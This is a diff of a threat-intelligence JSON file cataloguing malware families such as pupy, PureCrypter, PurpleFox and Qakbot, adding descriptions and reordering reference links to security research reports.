+ "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/"
],
"synonyms": [
"Pterodo"
@@ -37081,6 +39020,7 @@
"https://www.pandasecurity.com/mediacenter/malware/punkeypos/"
],
"synonyms": [
+ "poscardstealer",
"pospunk",
"punkeypos"
],
@@ -37094,21 +39034,22 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.pupy",
- "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf",
- "https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html",
- "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/",
- "https://securityaffairs.co/wordpress/56348/intelligence/magic-hound-campaign.html",
- "https://www.infinitumit.com.tr/apt-35/",
- "https://go.recordedfuture.com/hubfs/reports/cta-2020-0123.pdf",
- "https://documents.trendmicro.com/assets/txt/earth-berberoka-linux-iocs-2.txt",
"https://blog.cyber4sight.com/2017/02/malicious-powershell-script-analysis-indicates-shamoon-actors-used-pupy-rat/",
- "https://go.recordedfuture.com/hubfs/reports/cta-2022-0330.pdf",
- "https://www.volexity.com/blog/2022/06/15/driftingcloud-zero-day-sophos-firewall-exploitation-and-an-insidious-breach/",
- "https://www.secureworks.com/blog/iranian-pupyrat-bites-middle-eastern-organizations",
- "https://documents.trendmicro.com/assets/white_papers/wp-operation-earth-berberoka.pdf",
- "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage",
+ "https://www.infinitumit.com.tr/apt-35/",
+ "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2020-0123.pdf",
+ "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf",
"https://github.com/n1nj4sec/pupy",
- "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage"
+ "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage",
+ "https://securityaffairs.co/wordpress/56348/intelligence/magic-hound-campaign.html",
+ "https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html",
+ "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage",
+ "https://documents.trendmicro.com/assets/white_papers/wp-operation-earth-berberoka.pdf",
+ "https://www.secureworks.com/blog/iranian-pupyrat-bites-middle-eastern-organizations",
+ "https://www.volexity.com/blog/2022/06/15/driftingcloud-zero-day-sophos-firewall-exploitation-and-an-insidious-breach/",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2022-0330.pdf",
+ "https://labs.k7computing.com/index.php/pupy-rat-hiding-under-werfaults-cover/",
+ "https://documents.trendmicro.com/assets/txt/earth-berberoka-linux-iocs-2.txt"
],
"synonyms": [
"Patpoopy"
@@ -37118,14 +39059,28 @@
"uuid": "8a789016-5f8d-4cd9-ba96-ba253db42fd8",
"value": "pupy (Windows)"
},
+ {
+ "description": "According to zscaler, PureCrypter is a fully-featured loader being sold since at least March 2021\r\nThe malware has been observed distributing a variety of remote access trojans and information stealers\r\nThe loader is a .NET executable obfuscated with SmartAssembly and makes use of compression, encryption and obfuscation to evade antivirus software products\r\nPureCrypter features provide persistence, injection and defense mechanisms that are configurable in Google’s Protocol Buffer message format ",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.purecrypter",
+ "https://www.zscaler.com/blogs/security-research/technical-analysis-purecrypter",
+ "https://www.prodaft.com/m/reports/RIG___TLP_CLEAR-1.pdf"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "554993dc-2a30-43d9-ac96-fc9b9cca29f6",
+ "value": "PureCrypter"
+ },
{
"description": "ransomware",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.purelocker",
- "https://exchange.xforce.ibmcloud.com/collection/99c7156cff70e1d8e1687ab7dadc8c0e",
"https://www.intezer.com/blog-purelocker-ransomware-being-used-in-targeted-attacks-against-servers/",
- "https://github.com/albertzsigovits/malware-notes/blob/master/PureLocker.md"
+ "https://github.com/albertzsigovits/malware-notes/blob/master/PureLocker.md",
+ "https://exchange.xforce.ibmcloud.com/collection/99c7156cff70e1d8e1687ab7dadc8c0e"
],
"synonyms": [],
"type": []
@@ -37138,24 +39093,24 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.purplefox",
- "https://nao-sec.org/2021/04/exploit-kit-still-sharpens-a-sword.html",
- "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/security-101-the-impact-of-cryptocurrency-mining-malware",
- "https://www.trendmicro.com/en_us/research/21/l/a-look-into-purple-fox-server-infrastructure.html",
- "https://twitter.com/C0rk1_H/status/1412801973628272641?s=20",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/c/purple-fox-uses-new-arrival-vector-and-improves-malware-arsenal/Technical%20Brief%20-%20A%20Look%20Into%20Purple%20Fox%E2%80%99s%20New%20Arrival%20Vector.pdf",
- "https://www.trendmicro.com/en_us/research/21/g/purplefox-using-wpad-to-targent-indonesian-users.html",
- "https://blog.minerva-labs.com/malicious-telegram-installer-drops-purple-fox-rootkit",
- "https://s.tencent.com/research/report/1322.html",
- "https://www.trendmicro.com/en_in/research/22/c/purple-fox-uses-new-arrival-vector-and-improves-malware-arsenal.html",
- "https://threatresearch.ext.hp.com/purple-fox-exploit-kit-now-exploits-cve-2021-26411/",
- "https://www.thecybersecuritytimes.com/purple-fox-malware-is-actively-distributed-via-telegram-installers/",
- "https://blogs.blackberry.com/en/2022/01/threat-thursday-purple-fox-rootkit",
- "https://www.guardicore.com/labs/purple-fox-rootkit-now-propagates-as-a-worm/",
- "https://www.trendmicro.com/en_us/research/21/j/purplefox-adds-new-backdoor-that-uses-websockets.html",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/purple-fox-fileless-malware-with-rookit-component-delivered-by-rig-exploit-kit-now-abuses-powershell/",
"https://blog.malwarebytes.com/trojans/2021/03/perkiler-malware-turns-to-smb-brute-force-to-spread/",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/c/purple-fox-uses-new-arrival-vector-and-improves-malware-arsenal/Technical%20Brief%20-%20A%20Look%20Into%20Purple%20Fox%E2%80%99s%20New%20Arrival%20Vector.pdf",
+ "https://thehackernews.com/2022/03/purple-fox-hackers-spotted-using-new.html",
+ "https://twitter.com/C0rk1_H/status/1412801973628272641?s=20",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/purple-fox-fileless-malware-with-rookit-component-delivered-by-rig-exploit-kit-now-abuses-powershell/",
+ "https://nao-sec.org/2021/04/exploit-kit-still-sharpens-a-sword.html",
+ "https://blog.minerva-labs.com/malicious-telegram-installer-drops-purple-fox-rootkit",
+ "https://www.trendmicro.com/en_us/research/21/l/a-look-into-purple-fox-server-infrastructure.html",
+ "https://www.trendmicro.com/en_in/research/22/c/purple-fox-uses-new-arrival-vector-and-improves-malware-arsenal.html",
+ "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/security-101-the-impact-of-cryptocurrency-mining-malware",
+ "https://www.trendmicro.com/en_us/research/21/g/purplefox-using-wpad-to-targent-indonesian-users.html",
+ "https://www.trendmicro.com/en_us/research/21/j/purplefox-adds-new-backdoor-that-uses-websockets.html",
"https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/c/purple-fox-uses-new-arrival-vector-and-improves-malware-arsenal/IOCs-Purple-Fox.txt",
- "https://thehackernews.com/2022/03/purple-fox-hackers-spotted-using-new.html"
+ "https://www.guardicore.com/labs/purple-fox-rootkit-now-propagates-as-a-worm/",
+ "https://s.tencent.com/research/report/1322.html",
+ "https://www.thecybersecuritytimes.com/purple-fox-malware-is-actively-distributed-via-telegram-installers/",
+ "https://threatresearch.ext.hp.com/purple-fox-exploit-kit-now-exploits-cve-2021-26411/",
+ "https://blogs.blackberry.com/en/2022/01/threat-thursday-purple-fox-rootkit"
],
"synonyms": [],
"type": []
@@ -37164,7 +39119,7 @@
"value": "PurpleFox"
},
{
- "description": "",
+ "description": "ZScaler reported on a new Infostealer called PurpleWave, which is written in C++ and silently installs itself onto a user’s system. It connects to a command and control (C&C) server to send system information and installs new malware onto the infected system.\r\n\r\nThe author of this malware is advertising and selling PurpleWave stealer on Russian cybercrime forums for 5,000 RUB (US$68) with lifetime updates and 4,000 RUB (US$54) with only two updates.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.purplewave",
@@ -37181,14 +39136,14 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.pushdo",
- "https://www.secureworks.com/research/pushdo",
- "http://www.secureworks.com/research/threat-profiles/gold-essex",
- "http://malware-traffic-analysis.net/2017/04/03/index2.html",
- "https://www.trendmicro.de/cloud-content/us/pdfs/business/white-papers/wp_study-of-pushdo-cutwail-botnet.pdf",
- "https://www.blueliv.com/research/tracking-the-footproints-of-pushdo-trojan/",
"https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
- "https://www.secureworks.com/research/threat-profiles/gold-essex",
- "https://www.shadowserver.org/news/has-the-sun-set-on-the-necurs-botnet/"
+ "http://www.secureworks.com/research/threat-profiles/gold-essex",
+ "https://www.trendmicro.de/cloud-content/us/pdfs/business/white-papers/wp_study-of-pushdo-cutwail-botnet.pdf",
+ "https://www.secureworks.com/research/pushdo",
+ "https://www.shadowserver.org/news/has-the-sun-set-on-the-necurs-botnet/",
+ "http://malware-traffic-analysis.net/2017/04/03/index2.html",
+ "https://www.blueliv.com/research/tracking-the-footproints-of-pushdo-trojan/",
+ "https://www.secureworks.com/research/threat-profiles/gold-essex"
],
"synonyms": [],
"type": []
@@ -37239,32 +39194,32 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.pwndlocker",
- "https://www.it-klinika.rs/blog/paznja-novi-opasni-ransomware-pwndlocker-i-u-srbiji",
- "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
- "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
- "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/",
- "https://www.group-ib.com/blog/prolock_evolution",
- "https://www.intrinsec.com/egregor-prolock/",
- "https://www.group-ib.com/blog/prolock",
- "https://raw.githubusercontent.com/fboldewin/When-ransomware-hits-an-ATM-giant---The-Diebold-Nixdorf-case-dissected/main/When%20ransomware%20hits%20an%20ATM%20giant%20-%20The%20Diebold%20Nixdorf%20case%20dissected%20-%20Group-IB%20CyberCrimeCon2020.pdf",
- "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html",
- "https://medium.com/s2wlab/operation-synctrek-e5013df8d167",
"https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-009.pdf",
- "https://www.hornetsecurity.com/en/security-information/qakbot-malspam-leading-to-prolock/",
- "https://www.cert-pa.it/notizie/pwndlocker-si-rinnova-in-prolock-ransomware/",
- "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
- "https://norfolkinfosec.com/tinypos-and-prolocker-an-odd-relationship/",
- "https://www.bleepingcomputer.com/news/security/pwndlocker-ransomware-gets-pwned-decryption-now-available/",
- "https://soolidsnake.github.io/2020/05/11/Prolock_ransomware.html",
+ "https://www.group-ib.com/blog/prolock_evolution",
+ "https://www.bleepingcomputer.com/news/security/new-pwndlocker-ransomware-targeting-us-cities-enterprises/",
"https://id-ransomware.blogspot.com/2019/10/pwndlocker-ransomware.html",
"https://www.cert.ssi.gouv.fr/cti/CERTFR-2021-CTI-009/",
+ "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html",
+ "https://www.group-ib.com/blog/prolock",
+ "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/",
+ "https://soolidsnake.github.io/2020/05/11/Prolock_ransomware.html",
+ "https://www.intrinsec.com/egregor-prolock/",
"https://www.zdnet.com/article/fbi-prolock-ransomware-gains-access-to-victim-networks-via-qakbot-infections/",
- "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-009.pdf",
+ "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
+ "https://norfolkinfosec.com/tinypos-and-prolocker-an-odd-relationship/",
"https://news.sophos.com/en-us/2020/07/27/prolock-ransomware-gives-you-the-first-8-kilobytes-of-decryption-for-free/",
- "https://www.bleepingcomputer.com/news/security/new-pwndlocker-ransomware-targeting-us-cities-enterprises/",
+ "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
+ "https://www.it-klinika.rs/blog/paznja-novi-opasni-ransomware-pwndlocker-i-u-srbiji",
+ "https://medium.com/s2wlab/operation-synctrek-e5013df8d167",
"https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
- "https://www.hornetsecurity.com/en/threat-research/qakbot-reducing-its-on-disk-artifacts/"
+ "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
+ "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
+ "https://www.hornetsecurity.com/en/threat-research/qakbot-reducing-its-on-disk-artifacts/",
+ "https://raw.githubusercontent.com/fboldewin/When-ransomware-hits-an-ATM-giant---The-Diebold-Nixdorf-case-dissected/main/When%20ransomware%20hits%20an%20ATM%20giant%20-%20The%20Diebold%20Nixdorf%20case%20dissected%20-%20Group-IB%20CyberCrimeCon2020.pdf",
+ "https://www.bleepingcomputer.com/news/security/pwndlocker-ransomware-gets-pwned-decryption-now-available/",
+ "https://www.hornetsecurity.com/en/security-information/qakbot-malspam-leading-to-prolock/",
+ "https://www.cert-pa.it/notizie/pwndlocker-si-rinnova-in-prolock-ransomware/"
],
"synonyms": [
"ProLock"
@@ -37290,14 +39245,30 @@
"uuid": "c903627c-90f6-44ee-9750-4bb44bdbceab",
"value": "pwnpos"
},
+ {
+ "description": "Py2exe built worm propagating via USB drives, having wiper features embedded in the logic (based on today's date being later than 2016-04-03 and existence of a file C:\\txt.txt)",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pyfiledel",
+ "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/worm.win32.pyfiledel.aa",
+ "https://biebermalware.wordpress.com/2018/02/14/reversing-py2exe-binaries/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "ea8f44b0-6940-42e0-a93f-77a6b572b140",
+ "value": "win.pyfiledel"
+ },
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.pykspa",
- "https://blogs.akamai.com/sitr/2019/07/pykspa-v2-dga-updated-to-become-selective.html",
+ "https://bin.re/blog/pykspas-inferior-dga-version/",
"https://www.youtube.com/watch?v=HfSQlC76_s4",
"https://www.johannesbader.ch/2015/03/the-dga-of-pykspa/",
+ "https://blogs.akamai.com/sitr/2019/07/pykspa-v2-dga-updated-to-become-selective.html",
+ "https://bin.re/blog/the-dga-of-pykspa/",
"https://www.johannesbader.ch/2015/07/pykspas-inferior-dga-version/"
],
"synonyms": [],
@@ -37311,14 +39282,14 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.pylocky",
+ "https://www.cyborgsecurity.com/cyborg_labs/python-malware-on-the-rise/",
+ "https://www.bleepingcomputer.com/news/security/pylocky-decryptor-released-by-french-authorities/",
+ "https://sensorstechforum.com/lockymap-files-virus-pylocky-ransomware-remove-restore-data/",
"https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/",
- "https://www.cert.ssi.gouv.fr/alerte/CERTFR-2018-ALE-008/",
"https://blog.trendmicro.com/trendlabs-security-intelligence/a-closer-look-at-the-locky-poser-pylocky-ransomware/",
"https://blog.talosintelligence.com/2019/01/pylocky-unlocked-cisco-talos-releases.html",
- "https://www.bleepingcomputer.com/news/security/pylocky-decryptor-released-by-french-authorities/",
"https://www.cybermalveillance.gouv.fr/nos-articles/outil-dechiffrement-rancongiciel-ransomware-pylocky-v1-2/",
- "https://www.cyborgsecurity.com/cyborg_labs/python-malware-on-the-rise/",
- "https://sensorstechforum.com/lockymap-files-virus-pylocky-ransomware-remove-restore-data/"
+ "https://www.cert.ssi.gouv.fr/alerte/CERTFR-2018-ALE-008/"
],
"synonyms": [
"Locky Locker"
@@ -37333,19 +39304,19 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.pyxie",
- "https://www.secureworks.com/research/threat-profiles/gold-dupont",
- "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/4",
"https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/5/",
- "https://cluster25.io/2022/05/03/a-strange-link-between-a-destructive-malware-and-the-loader-of-a-ransomware-group-isaacwiper-vs-vatet/",
- "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-ransomexx",
- "https://threatvector.cylance.com/en_us/home/meet-pyxie-a-nefarious-new-python-rat.html",
"https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
- "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/3",
- "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout",
- "https://www.ic3.gov/Media/News/2021/211101.pdf",
"https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
+ "https://www.ic3.gov/Media/News/2021/211101.pdf",
+ "https://cluster25.io/2022/05/03/a-strange-link-between-a-destructive-malware-and-the-loader-of-a-ransomware-group-isaacwiper-vs-vatet/",
+ "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/2/",
+ "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/4",
"https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/",
- "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/2/"
+ "https://www.secureworks.com/research/threat-profiles/gold-dupont",
+ "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout",
+ "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/3",
+ "https://threatvector.cylance.com/en_us/home/meet-pyxie-a-nefarious-new-python-rat.html",
+ "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-ransomexx"
],
"synonyms": [
"PyXie RAT"
@@ -37372,13 +39343,13 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.qadars",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
- "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf",
- "https://www.johannesbader.ch/2016/04/the-dga-of-qadars/",
"https://info.phishlabs.com/blog/dissecting-the-qadars-banking-trojan",
- "https://securityintelligence.com/an-analysis-of-the-qadars-trojan/",
+ "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf",
"https://securityintelligence.com/meanwhile-britain-qadars-v3-hardens-evasion-targets-18-uk-banks/",
- "https://www.welivesecurity.com/2013/12/18/qadars-a-banking-trojan-with-the-netherlands-in-its-sights/"
+ "https://www.johannesbader.ch/2016/04/the-dga-of-qadars/",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
+ "https://www.welivesecurity.com/2013/12/18/qadars-a-banking-trojan-with-the-netherlands-in-its-sights/",
+ "https://securityintelligence.com/an-analysis-of-the-qadars-trojan/"
],
"synonyms": [],
"type": []
@@ -37391,179 +39362,219 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.qakbot",
- "https://securelist.com/qakbot-technical-analysis/103931/",
- "https://web.archive.org/web/20201207094648/https://go.group-ib.com/rs/689-LRE-818/images/Group-IB_Egregor_Ransomware.pdf",
- "https://www.f5.com/labs/articles/threat-intelligence/qbot-banking-trojan-still-up-to-its-old-tricks",
- "https://www.malwarology.com/posts/3-qakbot-process-injection/",
- "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
- "https://therecord.media/meet-prometheus-the-secret-tds-behind-some-of-todays-malware-campaigns/",
- "https://twitter.com/TheDFIRReport/status/1361331598344478727",
- "https://www.circl.lu/pub/tr-64/",
- "https://malwareandstuff.com/upnp-messing-up-security-since-years/",
- "https://www.crowdstrike.com/blog/duck-hunting-with-falcon-complete-analyzing-a-fowl-banking-trojan-part-1/",
- "https://thehackernews.com/2022/02/trickbot-gang-likely-shifting.html",
- "https://www.group-ib.com/blog/prolock_evolution",
- "https://www.trendmicro.com/en_us/research/21/c/egregor-ransomware-cartel-members-arrested.html",
- "https://securelist.com/malicious-spam-campaigns-delivering-banking-trojans/102917",
- "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html",
- "https://www.fortinet.com/blog/threat-research/notable-droppers-emerge-in-recent-threat-campaigns",
- "https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus",
- "https://www.securityartwork.es/2021/06/16/analisis-campana-emotet/",
- "https://www.malwarology.com/posts/1-qakbot-strings-obfuscation/",
- "https://blogs.vmware.com/security/2021/11/telemetry-peak-analyzer-an-automatic-malware-campaign-detector.html",
- "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
- "https://threatresearch.ext.hp.com/detecting-ta551-domains/",
- "https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/",
- "https://twitter.com/Unit42_Intel/status/1461004489234829320",
- "https://www.secureworks.com/research/threat-profiles/gold-lagoon",
- "https://www.elastic.co/security-labs/qbot-configuration-extractor",
- "https://www.trendmicro.com/en_us/research/21/l/staging-a-quack-reverse-analyzing-fileless-qakbot-stager.html",
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/decrypting-qakbots-encrypted-registry-keys/",
- "https://www.trendmicro.com/en_us/research/22/f/black-basta-ransomware-operators-expand-their-attack-arsenal-wit.html",
- "https://blog.group-ib.com/prometheus-tds",
- "https://twitter.com/_alex_il_/status/1384094623270727685",
- "https://www.um.edu.mt/library/oar/handle/123456789/76802",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
- "https://blog.talosintelligence.com/2016/04/qbot-on-the-rise.html",
- "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
- "https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/",
- "https://www.netskope.com/blog/squirrelwaffle-new-malware-loader-delivering-cobalt-strike-and-qakbot",
- "https://www.virusbulletin.com/uploads/pdf/magazine/2016/VB2016-Karve-etal.pdf",
- "http://contagiodump.blogspot.com/2010/11/template.html",
- "https://www.johannesbader.ch/2016/02/the-dga-of-qakbot/",
- "https://www.malwarology.com/2022/04/qakbot-series-process-injection/",
- "https://blog.quosec.net/posts/grap_qakbot_strings/",
- "https://documents.trendmicro.com/assets/pdf/Technical-Brief---The-Prelude-to-Ransomware-A-Look-into-Current-QAKBOT-Capabilities-and-Activity.pdf",
- "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/",
- "https://quosecgmbh.github.io/blog/grap_qakbot_navigation.html",
- "https://www.malwarology.com/posts/4-qakbot-api-hashing/",
- "https://www.crowdstrike.com/blog/duck-hunting-with-falcon-complete-qakbot-zip-based-campaign/",
- "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_qakbot_in_detail.pdf",
- "https://www.truesec.com/hub/blog/proxyshell-qbot-and-conti-ransomware-combined-in-a-series-of-cyber-attacks",
- "https://ibm.ent.box.com/s/hs5pcayhbbhjvj8di5sqdpbbd88tsh89",
- "https://go.recordedfuture.com/hubfs/reports/cta-2021-1112.pdf",
- "https://quosecgmbh.github.io/blog/grap_qakbot_strings.html",
- "https://content.fireeye.com/m-trends/rpt-m-trends-2020",
- "https://redcanary.com/blog/intelligence-insights-december-2021",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-009.pdf",
- "https://www.group-ib.com/blog/egregor",
- "https://www.trendmicro.com/en_us/research/22/e/bruised-but-not-broken--the-resurgence-of-the-emotet-botnet-malw.html",
- "https://www.bleepingcomputer.com/news/security/qbot-malware-switches-to-new-windows-installer-infection-vector/",
- "https://www.trendmicro.com/en_us/research/21/k/qakbot-loader-returns-with-new-techniques-and-tools.html",
- "https://twitter.com/kienbigmummy/status/1460537501676802051",
- "https://www.bleepingcomputer.com/news/security/fujifilm-shuts-down-network-after-suspected-ransomware-attack/",
- "https://isc.sans.edu/diary/rss/26862",
- "https://www.advanced-intel.com/post/from-qbot-with-revil-ransomware-initial-attack-exposure-of-jbs",
- "https://blog.reversinglabs.com/blog/spotting-malicious-excel4-macros",
- "https://www.cybereason.com/blog/threat-analysis-report-datoploader-exploits-proxyshell-to-deliver-qbot-and-cobalt-strike",
- "https://research.checkpoint.com/2020/exploring-qbots-latest-attack-methods/",
- "https://www.microsoft.com/security/blog/2017/11/06/mitigating-and-eliminating-info-stealing-qakbot-and-emotet-in-corporate-networks/",
- "https://seguranca-informatica.pt/a-taste-of-the-latest-release-of-qakbot",
- "https://www.varonis.com/blog/varonis-discovers-global-cyber-campaign-qbot/",
- "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbasta",
- "https://malwareandstuff.com/an-old-enemy-diving-into-qbot-part-1/",
- "https://www.bleepingcomputer.com/news/security/qbot-needs-only-30-minutes-to-steal-your-credentials-emails/",
- "https://documents.trendmicro.com/assets/rpt/rpt-navigating-new-frontiers-trend-micro-2021-annual-cybersecurity-report.pdf",
- "https://cybersecurity.att.com/blogs/labs-research/the-rise-of-qakbot",
- "https://blog.minerva-labs.com/a-new-datoploader-delivers-qakbot-trojan",
- "https://www.zscaler.com/blogs/security-research/ares-banking-trojan-learns-old-tricks-adds-defunct-qakbot-dga",
- "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations.pdf",
- "https://blog.quosec.net/posts/grap_qakbot_navigation/",
- "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
- "https://research.nccgroup.com/2022/03/31/conti-nuation-methods-and-techniques-observed-in-operations-post-the-leaks/",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-010.pdf",
- "https://experience.mandiant.com/trending-evil/p/1",
- "https://malwareandstuff.com/an-old-enemy-diving-into-qbot-part-3/",
- "https://www.hornetsecurity.com/en/threat-research/qakbot-reducing-its-on-disk-artifacts/",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
- "https://intel471.com/blog/ettersilent-maldoc-builder-macro-trickbot-qbot/",
- "https://www.cylance.com/en_us/blog/threat-spotlight-the-return-of-qakbot-malware.html",
- "https://www.youtube.com/watch?v=4I0LF8Vm7SI",
- "https://isc.sans.edu/diary/rss/28728",
- "https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf",
- "https://go.recordedfuture.com/hubfs/reports/cta-2020-1203.pdf",
- "https://www.vkremez.com/2018/07/lets-learn-in-depth-reversing-of-qakbot.html",
- "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
- "https://www.cybereason.com/blog/cybereason-vs-egregor-ransomware",
- "https://elis531989.medium.com/funtastic-packers-and-where-to-find-them-41429a7ef9a7",
- "https://hatching.io/blog/reversing-qakbot",
- "https://redcanary.com/blog/intelligence-insights-november-2021/",
- "https://go.recordedfuture.com/hubfs/reports/cta-2022-0118.pdf",
- "https://team-cymru.com/blog/2021/11/03/webinject-panel-administration-a-vantage-point-into-multiple-threat-actor-campaigns/",
- "https://twitter.com/tylabs/status/1462195377277476871",
- "https://www.0ffset.net/reverse-engineering/malware-analysis/qakbot-browser-hooking-p1/",
- "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/",
- "https://www.elastic.co/de/security-labs/qbot-malware-analysis",
- "https://isc.sans.edu/diary/rss/28568",
- "https://twitter.com/Corvid_Cyber/status/1455844008081641472",
- "https://www.cynet.com/attack-techniques-hands-on/quakbot-strikes-with-quaknightmare-exploitation/",
- "https://www.elastic.co/security-labs/qbot-malware-analysis",
